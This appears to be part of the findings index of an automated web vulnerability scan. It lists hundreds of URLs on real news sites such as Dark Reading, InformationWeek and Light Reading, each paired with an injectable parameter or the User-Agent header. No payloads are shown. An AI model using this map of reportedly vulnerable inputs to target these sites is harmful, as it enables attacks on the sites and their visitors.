3.528. http://www.darkreading.com/security/article/224700541/index.html [name of an arbitrarily supplied request parameter]

3.529. http://www.darkreading.com/security/article/224900081/index.html [REST URL parameter 2]

3.530. http://www.darkreading.com/security/article/224900081/index.html [REST URL parameter 3]

3.531. http://www.darkreading.com/security/article/224900081/index.html [REST URL parameter 4]

3.532. http://www.darkreading.com/security/article/224900081/index.html [REST URL parameter 4]

3.533. http://www.darkreading.com/security/article/224900081/index.html [name of an arbitrarily supplied request parameter]

3.534. http://www.darkreading.com/security/article/225200571/index.html [REST URL parameter 2]

3.535. http://www.darkreading.com/security/article/225200571/index.html [REST URL parameter 3]

3.536. http://www.darkreading.com/security/article/225200571/index.html [REST URL parameter 4]

3.537. http://www.darkreading.com/security/article/225200571/index.html [REST URL parameter 4]

3.538. http://www.darkreading.com/security/article/225200571/index.html [name of an arbitrarily supplied request parameter]

3.539. http://www.darkreading.com/security/article/225600438/index.html [REST URL parameter 2]

3.540. http://www.darkreading.com/security/article/225600438/index.html [REST URL parameter 3]

3.541. http://www.darkreading.com/security/article/225600438/index.html [REST URL parameter 4]

3.542. http://www.darkreading.com/security/article/225600438/index.html [REST URL parameter 4]

3.543. http://www.darkreading.com/security/article/225600438/index.html [name of an arbitrarily supplied request parameter]

3.544. http://www.darkreading.com/security/article/225700088/index.html [REST URL parameter 2]

3.545. http://www.darkreading.com/security/article/225700088/index.html [REST URL parameter 3]

3.546. http://www.darkreading.com/security/article/225700088/index.html [REST URL parameter 4]

3.547. http://www.darkreading.com/security/article/225700088/index.html [REST URL parameter 4]

3.548. http://www.darkreading.com/security/article/225700088/index.html [name of an arbitrarily supplied request parameter]

3.549. http://www.darkreading.com/security/article/225701534/index.html [REST URL parameter 2]

3.550. http://www.darkreading.com/security/article/225701534/index.html [REST URL parameter 3]

3.551. http://www.darkreading.com/security/article/225701534/index.html [REST URL parameter 4]

3.552. http://www.darkreading.com/security/article/225701534/index.html [REST URL parameter 4]

3.553. http://www.darkreading.com/security/article/225701534/index.html [name of an arbitrarily supplied request parameter]

3.554. http://www.darkreading.com/security/article/225701866/index.html [REST URL parameter 2]

3.555. http://www.darkreading.com/security/article/225701866/index.html [REST URL parameter 3]

3.556. http://www.darkreading.com/security/article/225701866/index.html [REST URL parameter 4]

3.557. http://www.darkreading.com/security/article/225701866/index.html [REST URL parameter 4]

3.558. http://www.darkreading.com/security/article/225701866/index.html [name of an arbitrarily supplied request parameter]

3.559. http://www.darkreading.com/security/article/225702192/index.html [REST URL parameter 2]

3.560. http://www.darkreading.com/security/article/225702192/index.html [REST URL parameter 3]

3.561. http://www.darkreading.com/security/article/225702192/index.html [REST URL parameter 4]

3.562. http://www.darkreading.com/security/article/225702192/index.html [REST URL parameter 4]

3.563. http://www.darkreading.com/security/article/225702192/index.html [name of an arbitrarily supplied request parameter]

3.564. http://www.darkreading.com/security/article/225702468/index.html [REST URL parameter 2]

3.565. http://www.darkreading.com/security/article/225702468/index.html [REST URL parameter 3]

3.566. http://www.darkreading.com/security/article/225702468/index.html [REST URL parameter 4]

3.567. http://www.darkreading.com/security/article/225702468/index.html [REST URL parameter 4]

3.568. http://www.darkreading.com/security/article/225702468/index.html [name of an arbitrarily supplied request parameter]

3.569. http://www.darkreading.com/security/article/225702839/index.html [REST URL parameter 2]

3.570. http://www.darkreading.com/security/article/225702839/index.html [REST URL parameter 3]

3.571. http://www.darkreading.com/security/article/225702839/index.html [REST URL parameter 4]

3.572. http://www.darkreading.com/security/article/225702839/index.html [REST URL parameter 4]

3.573. http://www.darkreading.com/security/article/225702839/index.html [name of an arbitrarily supplied request parameter]

3.574. http://www.darkreading.com/security/article/226600195/index.html [REST URL parameter 2]

3.575. http://www.darkreading.com/security/article/226600195/index.html [REST URL parameter 3]

3.576. http://www.darkreading.com/security/article/226600195/index.html [REST URL parameter 4]

3.577. http://www.darkreading.com/security/article/226600195/index.html [REST URL parameter 4]

3.578. http://www.darkreading.com/security/article/226600195/index.html [name of an arbitrarily supplied request parameter]

3.579. http://www.darkreading.com/security/article/226700229/index.html [REST URL parameter 2]

3.580. http://www.darkreading.com/security/article/226700229/index.html [REST URL parameter 3]

3.581. http://www.darkreading.com/security/article/226700229/index.html [REST URL parameter 4]

3.582. http://www.darkreading.com/security/article/226700229/index.html [REST URL parameter 4]

3.583. http://www.darkreading.com/security/article/226700229/index.html [name of an arbitrarily supplied request parameter]

3.584. http://www.darkreading.com/security/article/226700529/index.html [REST URL parameter 2]

3.585. http://www.darkreading.com/security/article/226700529/index.html [REST URL parameter 3]

3.586. http://www.darkreading.com/security/article/226700529/index.html [REST URL parameter 4]

3.587. http://www.darkreading.com/security/article/226700529/index.html [REST URL parameter 4]

3.588. http://www.darkreading.com/security/article/226900007/index.html [REST URL parameter 2]

3.589. http://www.darkreading.com/security/article/226900007/index.html [REST URL parameter 3]

3.590. http://www.darkreading.com/security/article/226900007/index.html [REST URL parameter 4]

3.591. http://www.darkreading.com/security/article/226900007/index.html [REST URL parameter 4]

3.592. http://www.darkreading.com/security/article/226900007/index.html [name of an arbitrarily supplied request parameter]

3.593. http://www.darkreading.com/security/article/227300150/index.html [REST URL parameter 2]

3.594. http://www.darkreading.com/security/article/227300150/index.html [REST URL parameter 3]

3.595. http://www.darkreading.com/security/article/227300150/index.html [REST URL parameter 4]

3.596. http://www.darkreading.com/security/article/227300150/index.html [REST URL parameter 4]

3.597. http://www.darkreading.com/security/article/227300150/index.html [name of an arbitrarily supplied request parameter]

3.598. http://www.darkreading.com/security/article/227500152/index.html [REST URL parameter 2]

3.599. http://www.darkreading.com/security/article/227500152/index.html [REST URL parameter 3]

3.600. http://www.darkreading.com/security/article/227500152/index.html [REST URL parameter 4]

3.601. http://www.darkreading.com/security/article/227500152/index.html [REST URL parameter 4]

3.602. http://www.darkreading.com/security/article/227500152/index.html [name of an arbitrarily supplied request parameter]

3.603. http://www.darkreading.com/security/attacks-breaches [name of an arbitrarily supplied request parameter]

3.604. http://www.darkreading.com/security/client-security [name of an arbitrarily supplied request parameter]

3.605. http://www.darkreading.com/security/encryption [name of an arbitrarily supplied request parameter]

3.606. http://www.darkreading.com/security/nac [name of an arbitrarily supplied request parameter]

3.607. http://www.darkreading.com/security/perimeter-security [name of an arbitrarily supplied request parameter]

3.608. http://www.darkreading.com/security/privacy [name of an arbitrarily supplied request parameter]

3.609. http://www.darkreading.com/security/security-management [name of an arbitrarily supplied request parameter]

3.610. http://www.darkreading.com/security/storage-security [name of an arbitrarily supplied request parameter]

3.611. http://www.darkreading.com/security/vulnerabilities [name of an arbitrarily supplied request parameter]

3.612. https://www.ddjsubscriptions.com/ars/ddjintlforward.do [K parameter]

3.613. http://www.informationweek.com/GLOBAL/btg/iwbtn/user/register.jhtml [REST URL parameter 1]

3.614. http://www.informationweek.com/GLOBAL/btg/iwbtn/user/register.jhtml [REST URL parameter 2]

3.615. http://www.informationweek.com/GLOBAL/btg/iwbtn/user/register.jhtml [REST URL parameter 2]

3.616. http://www.informationweek.com/GLOBAL/btg/iwbtn/user/register.jhtml [REST URL parameter 5]

3.617. http://www.informationweek.com/GLOBAL/btg/iwbtn/user/register.jhtml [REST URL parameter 5]

3.618. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [REST URL parameter 1]

3.619. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [REST URL parameter 1]

3.620. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [REST URL parameter 4]

3.621. http://www.informationweek.com/blog/main/archives/david_berlinds_tech_radar/index.html [REST URL parameter 4]

3.622. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 1]

3.623. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 1]

3.624. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 2]

3.625. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 2]

3.626. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 3]

3.627. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 3]

3.628. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 4]

3.629. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 4]

3.630. http://www.informationweek.com/blog/main/archives/digital_life/index.html [REST URL parameter 5]

3.631. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 2]

3.632. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 2]

3.633. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 3]

3.634. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 3]

3.635. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 4]

3.636. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 4]

3.637. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 5]

3.638. http://www.informationweek.com/blog/main/archives/global_cio/index.html [REST URL parameter 5]

3.639. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 1]

3.640. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 1]

3.641. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 2]

3.642. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 3]

3.643. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 3]

3.644. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 5]

3.645. http://www.informationweek.com/blog/main/archives/microsoft/index.html [REST URL parameter 5]

3.646. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 1]

3.647. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 3]

3.648. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 3]

3.649. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 4]

3.650. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 4]

3.651. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 5]

3.652. http://www.informationweek.com/blog/main/archives/mobile/index.html [REST URL parameter 5]

3.653. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 1]

3.654. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 1]

3.655. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 2]

3.656. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 3]

3.657. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 3]

3.658. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 4]

3.659. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 5]

3.660. http://www.informationweek.com/blog/main/archives/wolfes_den/index.html [REST URL parameter 5]

3.661. http://www.informationweek.com/cloud-computing/ [REST URL parameter 1]

3.662. http://www.informationweek.com/cloud-computing/ [REST URL parameter 1]

3.663. http://www.informationweek.com/cloud-computing/ [name of an arbitrarily supplied request parameter]

3.664. http://www.informationweek.com/events/ [REST URL parameter 1]

3.665. http://www.informationweek.com/events/ [REST URL parameter 1]

3.666. http://www.informationweek.com/global-cio/ [REST URL parameter 1]

3.667. http://www.informationweek.com/global-cio/ [REST URL parameter 1]

3.668. http://www.informationweek.com/government/ [REST URL parameter 1]

3.669. http://www.informationweek.com/government/ [REST URL parameter 1]

3.670. http://www.informationweek.com/healthcare/ [REST URL parameter 1]

3.671. http://www.informationweek.com/healthcare/ [REST URL parameter 1]

3.672. http://www.informationweek.com/iw500/ [REST URL parameter 1]

3.673. http://www.informationweek.com/iw500/ [REST URL parameter 1]

3.674. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 1]

3.675. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 1]

3.676. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 2]

3.677. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 2]

3.678. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 3]

3.679. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 3]

3.680. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 4]

3.681. http://www.informationweek.com/news/galleries/smb/ebusiness/showArticle.jhtml [REST URL parameter 4]

3.682. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 1]

3.683. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 1]

3.684. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 2]

3.685. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 2]

3.686. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 3]

3.687. http://www.informationweek.com/news/global-cio/interviews/showArticle.jhtml [REST URL parameter 3]

3.688. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 1]

3.689. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 1]

3.690. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 2]

3.691. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 2]

3.692. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 3]

3.693. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 3]

3.694. http://www.informationweek.com/news/government/policy/showArticle.jhtml [REST URL parameter 4]

3.695. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 1]

3.696. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 1]

3.697. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 2]

3.698. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 2]

3.699. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 3]

3.700. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 3]

3.701. http://www.informationweek.com/news/storage/data_protection/showArticle.jhtml [REST URL parameter 4]

3.702. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 1]

3.703. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 1]

3.704. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 2]

3.705. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 2]

3.706. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 3]

3.707. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 3]

3.708. http://www.informationweek.com/news/storage/systems/showArticle.jhtml [REST URL parameter 4]

3.709. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 1]

3.710. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 1]

3.711. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 2]

3.712. http://www.informationweek.com/newsletters/DR_subscribe.jhtml [REST URL parameter 2]

3.713. http://www.informationweek.com/newsletters/subscribe.jhtml [REST URL parameter 2]

3.714. http://www.informationweek.com/take.jhtml [REST URL parameter 1]

3.715. http://www.informationweek.com/take.jhtml [REST URL parameter 1]

3.716. http://www.informationweek.com/video/security/ [REST URL parameter 2]

3.717. http://www.informationweek.com/video/security/ [REST URL parameter 2]

3.718. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 1]

3.719. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 1]

3.720. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 2]

3.721. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 2]

3.722. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 3]

3.723. http://www.informationweek.com/video/security/20464495001 [REST URL parameter 3]

3.724. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 2]

3.725. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 2]

3.726. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 3]

3.727. http://www.informationweek.com/video/security/20979809001 [REST URL parameter 3]

3.728. http://www.informationweek.com/video/security/21090964001 [REST URL parameter 1]

3.729. http://www.informationweek.com/video/security/21090964001 [REST URL parameter 1]

3.730. http://www.informationweek.com/video/security/21090964001 [REST URL parameter 2]

3.731. http://www.informationweek.com/video/security/21090964001 [REST URL parameter 3]

3.732. http://www.informationweek.com/video/security/21090964001 [REST URL parameter 3]

3.733. http://www.informationweek.com/video/security/37740285001 [REST URL parameter 1]

3.734. http://www.informationweek.com/video/security/37740285001 [REST URL parameter 2]

3.735. http://www.informationweek.com/video/security/37740285001 [REST URL parameter 2]

3.736. http://www.informationweek.com/video/security/37740285001 [REST URL parameter 3]

3.737. http://www.informationweek.com/video/security/42988833001 [REST URL parameter 1]

3.738. http://www.informationweek.com/video/security/42988833001 [REST URL parameter 3]

3.739. http://www.informationweek.com/video/security/42988833001 [REST URL parameter 3]

3.740. http://www.informationweek.com/video/security/44865844001 [REST URL parameter 1]

3.741. http://www.informationweek.com/video/security/44865844001 [REST URL parameter 1]

3.742. http://www.informationweek.com/video/security/44865844001 [REST URL parameter 2]

3.743. http://www.informationweek.com/video/security/44865844001 [REST URL parameter 2]

3.744. http://www.informationweek.com/video/security/68506465001 [REST URL parameter 2]

3.745. http://www.informationweek.com/video/security/68506465001 [REST URL parameter 2]

3.746. http://www.informationweek.com/video/security/68506465001 [REST URL parameter 3]

3.747. http://www.informationweek.com/video/security/68506465001 [REST URL parameter 3]

3.748. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 1]

3.749. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 1]

3.750. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 3]

3.751. http://www.informationweek.com/video/security/68553969001 [REST URL parameter 3]

3.752. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 1]

3.753. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 1]

3.754. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 2]

3.755. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 2]

3.756. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 3]

3.757. http://www.informationweek.com/video/security/81784308001 [REST URL parameter 3]

3.758. http://www.informationweek.com/whitepaper/ [REST URL parameter 1]

3.759. http://www.informationweek.com/whitepaper/Security [REST URL parameter 1]

3.760. http://www.informationweek.com/whitepaper/Security [REST URL parameter 1]

3.761. http://www.informationweek.com/whitepaper/Security [REST URL parameter 2]

3.762. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 2]

3.763. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 2]

3.764. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 3]

3.765. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 3]

3.766. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 4]

3.767. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 [REST URL parameter 4]

3.768. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [REST URL parameter 2]

3.769. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [REST URL parameter 2]

3.770. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [REST URL parameter 3]

3.771. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 [REST URL parameter 3]

3.772. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 2]

3.773. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 2]

3.774. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 3]

3.775. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 3]

3.776. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 4]

3.777. http://www.informationweek.com/whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 [REST URL parameter 4]

3.778. http://www.informationweek.com/whitepaper/Security/Encryption/buyers-guide-to-endpoint-protection-platform-wp1257517519691 [REST URL parameter 4]

3.779. http://www.informationweek.com/whitepaper/Security/Encryption/buyers-guide-to-endpoint-protection-platform-wp1257517519691 [REST URL parameter 4]

3.780. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [REST URL parameter 1]

3.781. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [REST URL parameter 2]

3.782. http://www.informationweek.com/whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 [REST URL parameter 4]

3.783. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 2]

3.784. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 2]

3.785. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 3]

3.786. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 3]

3.787. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 4]

3.788. http://www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012 [REST URL parameter 4]

3.789. http://www.informationweek.com/whitepaper/advancedSearch/resultsCollection.jhtml [REST URL parameter 1]

3.790. http://www.informationweek.com/whitepaper/advancedSearch/resultsCollection.jhtml [REST URL parameter 1]

3.791. http://www.informationweek.com/whitepaper/advancedSearch/resultsCollection.jhtml [REST URL parameter 2]

3.792. http://www.informationweek.com/whitepaper/advancedSearch/resultsCollection.jhtml [REST URL parameter 2]

3.793. http://www.lightreading.com/archives.asp [name of an arbitrarily supplied request parameter]

3.794. http://www.lightreading.com/archives.asp [section_name parameter]

3.795. http://www.lightreading.com/archives.asp [section_name parameter]

3.796. http://www.lightreading.com/blog.asp [name of an arbitrarily supplied request parameter]

3.797. http://www.lightreading.com/document.asp [name of an arbitrarily supplied request parameter]

3.798. http://www.lightreading.com/lg_redirect.asp [piddl_lg_pcode parameter]

3.799. http://www.lightreading.com/login.asp [piddl_msg parameter]

3.800. http://www.lightreading.com/quote.asp [Ticker parameter]

3.801. http://www.lightreading.com/quote.asp [name of an arbitrarily supplied request parameter]

3.802. http://www.lightreading.com/resource-library.asp [name of an arbitrarily supplied request parameter]

3.803. http://www.lightreading.com/topics.asp [name of an arbitrarily supplied request parameter]

3.804. https://www.linkedin.com/groups [REST URL parameter 1]

3.805. http://www.pyr.com/All_Previews.htm [videoId parameter]

3.806. http://briefingcenters.techweb.com/ [User-Agent HTTP header]

3.807. http://darkreading.com/database_security/security/app-security/showArticle.jhtml [User-Agent HTTP header]

3.808. http://darkreading.com/database_security/security/vulnerabilities/showArticle.jhtml [User-Agent HTTP header]

3.809. http://gamasutra.com/ [User-Agent HTTP header]

3.810. http://www.contentinople.com/ [User-Agent HTTP header]

3.811. http://www.contentinople.com/author.asp [User-Agent HTTP header]

3.812. http://www.contentinople.com/author.asp [User-Agent HTTP header]

3.813. http://www.darkreading.com/blog/ [User-Agent HTTP header]

3.814. http://www.darkreading.com/blog/227700484/real-life-social-engineering.html [User-Agent HTTP header]

3.815. http://www.darkreading.com/blog/227700498/finding-exposed-devices-on-your-network.html [User-Agent HTTP header]

3.816. http://www.darkreading.com/blog/227700510/relying-on-tools-makes-you-dumber.html [User-Agent HTTP header]

3.817. http://www.darkreading.com/blog/227700524/virtual-machines-for-fun-profit-and-pwnage.html [User-Agent HTTP header]

3.818. http://www.darkreading.com/blog/227700535/using-the-36-stratagems-for-social-engineering.html [User-Agent HTTP header]

3.819. http://www.darkreading.com/blog/227700545/snort-ing-out-anomalies.html [User-Agent HTTP header]

3.820. http://www.darkreading.com/blog/227700548/real-world-attacks-with-social-engineering-tookit.html [User-Agent HTTP header]

3.821. http://www.darkreading.com/blog/227700577/suspected-child-porn-hub-taken-offline.html [User-Agent HTTP header]

3.822. http://www.darkreading.com/blog/227700656/friction-free-security.html [User-Agent HTTP header]

3.823. http://www.darkreading.com/blog/227700682/protecting-your-network-from-the-unpatchable.html [User-Agent HTTP header]

3.824. http://www.darkreading.com/blog/227700741/conquering-large-web-apps-with-solid-methodology.html [User-Agent HTTP header]

3.825. http://www.darkreading.com/blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html [User-Agent HTTP header]

3.826. http://www.darkreading.com/blog/227700767/protecting-ssh-from-the-masses.html [User-Agent HTTP header]

3.827. http://www.darkreading.com/blog/227700795/there-s-a-recipe-for-that.html [User-Agent HTTP header]

3.828. http://www.darkreading.com/blog/227700800/security-s-top-4-social-engineers-of-all-time.html [User-Agent HTTP header]

3.829. http://www.darkreading.com/blog/227700826/taking-usb-attacks-to-the-next-level.html [User-Agent HTTP header]

3.830. http://www.darkreading.com/blog/227700830/detection-and-defense-of-windows-autorun-locations.html [User-Agent HTTP header]

3.831. http://www.darkreading.com/blog/227700832/make-security-about-security-not-compliance.html [User-Agent HTTP header]

3.832. http://www.darkreading.com/blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html [User-Agent HTTP header]

3.833. http://www.darkreading.com/blog/227700845/ways-to-slow-an-attacker.html [User-Agent HTTP header]

3.834. http://www.darkreading.com/blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html [User-Agent HTTP header]

3.835. http://www.darkreading.com/blog/227700848/vxworks-vulnerability-tools-released.html [User-Agent HTTP header]

3.836. http://www.darkreading.com/blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html [User-Agent HTTP header]

3.837. http://www.darkreading.com/blog/227700876/web-based-spam-detection-with-google-alerts.html [User-Agent HTTP header]

3.838. http://www.darkreading.com/blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html [User-Agent HTTP header]

3.839. http://www.darkreading.com/blog/227700968/lock-picking-popularity-grows.html [User-Agent HTTP header]

3.840. http://www.darkreading.com/blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html [User-Agent HTTP header]

3.841. http://www.darkreading.com/blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html [User-Agent HTTP header]

3.842. http://www.darkreading.com/blog/227700998/blocking-zero-days-with-emet-2-0.html [User-Agent HTTP header]

3.843. http://www.darkreading.com/blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html [User-Agent HTTP header]

3.844. http://www.darkreading.com/blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html [User-Agent HTTP header]

3.845. http://www.darkreading.com/blog/228200587/cookies-social-media-and-firesheep.html [User-Agent HTTP header]

3.846. http://www.darkreading.com/blog/228200589/nosql-not-much-anyway.html [User-Agent HTTP header]

3.847. http://www.darkreading.com/blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html [User-Agent HTTP header]

3.848. http://www.darkreading.com/blog/228600139/avast-ye-pirates-it-s-free.html [User-Agent HTTP header]

3.849. http://www.darkreading.com/blog/228800188/the-hazards-of-bot-volunteerism.html [User-Agent HTTP header]

3.850. http://www.darkreading.com/blog/archives/2008/01/index.html [User-Agent HTTP header]

3.851. http://www.darkreading.com/blog/archives/2008/02/index.html [User-Agent HTTP header]

3.852. http://www.darkreading.com/blog/archives/2008/03/index.html [User-Agent HTTP header]

3.853. http://www.darkreading.com/blog/archives/2008/04/index.html [User-Agent HTTP header]

3.854. http://www.darkreading.com/blog/archives/2009/01/how_hackers_wil.html [User-Agent HTTP header]

3.855. http://www.darkreading.com/blog/archives/2009/01/index.html [User-Agent HTTP header]

3.856. http://www.darkreading.com/blog/archives/2009/02/index.html [User-Agent HTTP header]

3.857. http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html [User-Agent HTTP header]

3.858. http://www.darkreading.com/blog/archives/2009/03/index.html [User-Agent HTTP header]

3.859. http://www.darkreading.com/blog/archives/2009/04/index.html [User-Agent HTTP header]

3.860. http://www.darkreading.com/blog/archives/2009/05/index.html [User-Agent HTTP header]

3.861. http://www.darkreading.com/blog/archives/2009/06/index.html [User-Agent HTTP header]

3.862. http://www.darkreading.com/blog/archives/2009/07/index.html [User-Agent HTTP header]

3.863. http://www.darkreading.com/blog/archives/2009/08/index.html [User-Agent HTTP header]

3.864. http://www.darkreading.com/blog/archives/2009/09/index.html [User-Agent HTTP header]

